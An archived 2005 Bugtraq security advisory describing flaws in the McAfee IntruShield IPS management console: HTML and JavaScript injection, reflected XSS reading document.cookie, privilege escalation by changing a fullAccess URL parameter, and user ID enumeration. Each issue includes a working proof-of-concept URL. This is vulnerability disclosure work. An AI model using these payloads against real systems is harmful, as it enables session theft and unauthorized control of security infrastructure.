McAfee Intrushield IPS Abuse

c0ntexb_at_gmail.com
Date: 07/06/05

  • Next message: Marcus Meissner: "SUSE Security Announcement: zlib denial of service attack (SUSE-SA:2005:039)"
    Date: 6 Jul 2005 15:03:06 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)  /*
      *****************************************************************************************************************
      $ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
      *****************************************************************************************************************
      1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
      2: Bug Released: July 06 2005
      3: Bug Impact Rate: Medium / Hi
      4: Bug Scope Rate: Local / Remote
      *****************************************************************************************************************
      $ This advisory and/or proof of concept code must not be used for commercial gain.
      *****************************************************************************************************************

      McAfee IntruShield Security Management System
      http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm

      "The McAfee IntruShield Security Management System is an advanced solution for administering IntruShield
      sensor appliance deployments. The IntruShield Security Management System (ISM) can support both large and
      small network intrusion prevention system (IPS) deployments and can scale up to several hundred sensor
      appliances. By integrating a comprehensive set of Best-in-Class security management functions, the
      IntruShield Security Management System dramatically simplifies and streamlines the complexities associated
      with IPS configuration, policy compliance, and threat and response management."

      I have found some security vulnerabilities in this product whereby a user can elevate their privileges from
      a user that can only view alerts logged by remote sensors, to a scenario where the user can gain access to
      acknowledge, accept and delete alerts and access the Management Console. It is also possible to inject
      malicious HTML and JavaScript into the URLS and have this malicious script run on the clients machine,
      allowing for account information hijacking.

      A new version has been released to address these bugs and can be downloaded from their site.

    */

      Issues:
      1) Inject HTML
      2) Inject JavaScript
      3) Access privileged reports
      4) Acknowledge and delete alerts
      5) Gain access to Management Console

      Note: for issues 1 - 4, the attacker needs a valid user account.

      1) It is possible to embed HTML into the MISMS. This could potentially allow phishing attacks to be performed
      against a valid Manager account.

      https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
      domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&
      topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="
      http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600 >
      </iframe>&severity=critical&count=1

      2) It is possible to embed JavaScript into the MISMS and have the embedded script execute in the security
      context of the user browsing the Management System.

      https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
      domainName=Demo&resourceName=<script>alert("There could be trouble ahead")</script><script>alert(document.cookie)
      </script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=
      Critical&severity=critical&count=1

      3) It is possible to access the restricted "Generate Reports" section of the MISMS and as such, a non-privileged
      user can gain important information regarding the configuration and set-up of the IP devices being managed by the
      Service. This can be achieved by simply changing the Access option from false to true.

      https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&
      selectedDomain=0&fullAccessRight=true

      4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS console by modifying URL's
      sent to the system by simply changing the Access option from false to true.

      https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&
      domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&
      topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=
      critical&count=1

      Each change is emailed out to the administrator, however the email only says that "someone" made a change.

      5) As default, all user ID values are passed in the URL in the clear, meaning that it is trivial for an attacker
      to brute force accounts until a privileged Manager account is found. An example of this would look similar to:

      https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
      https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
      https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
      https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif

      This process can be continued until a valid user ID has been found with privileges to access the configure screen.

      Since javascript can be run in the browsers of clients accessing the device, it would be possible to redraw the page
      with IFRAME's and recreate the user login page to snoop usersnames and passwords.


  • Next message: Marcus Meissner: "SUSE Security Announcement: zlib denial of service attack (SUSE-SA:2005:039)"

    Relevant Pages

    • RE: CISSP-ISSMP
      ... management say "that's nice", and move on. ... education, certification, experience, know-how, abilities, and ... Many 'security jobs' are nothing shy than that of an overly glorified ... Download FREE whitepaper on how a managed service ...
      (Pen-Test)
    • [Full-disclosure] McAfee Intrushield IPS Abuse
      ... McAfee IntruShield Security Management System ... "The McAfee IntruShield Security Management System is an advanced solution ...
      (Full-Disclosure)
    • RE: security not a big priority?
      ... But I have found that upper management will only ... and push out the changes; management has to have this information to ... Network Security Engineer ... Network team with Project Management tasks. ...
      (Security-Basics)
    • RE: Down with DHCP!!!!
      ... Managing/monitoring the DHCP pools as assignments yourself ... -Other management tools as in Asset ... Security Administrator ... Network Operations-ICW Group ...
      (Security-Basics)
    • Re: [fw-wiz] Securing a Linux Firewall
      ... site, management wants to use IM/ICQ/etc, different businuss groups want ... protocols from the ground up to fix the issues of security. ... > a minimal install as Known Good is an act of hopeful optimism that I ... need a whole department broken into OS/hw groups to maintain proper builds ...
      (Firewall-Wizards)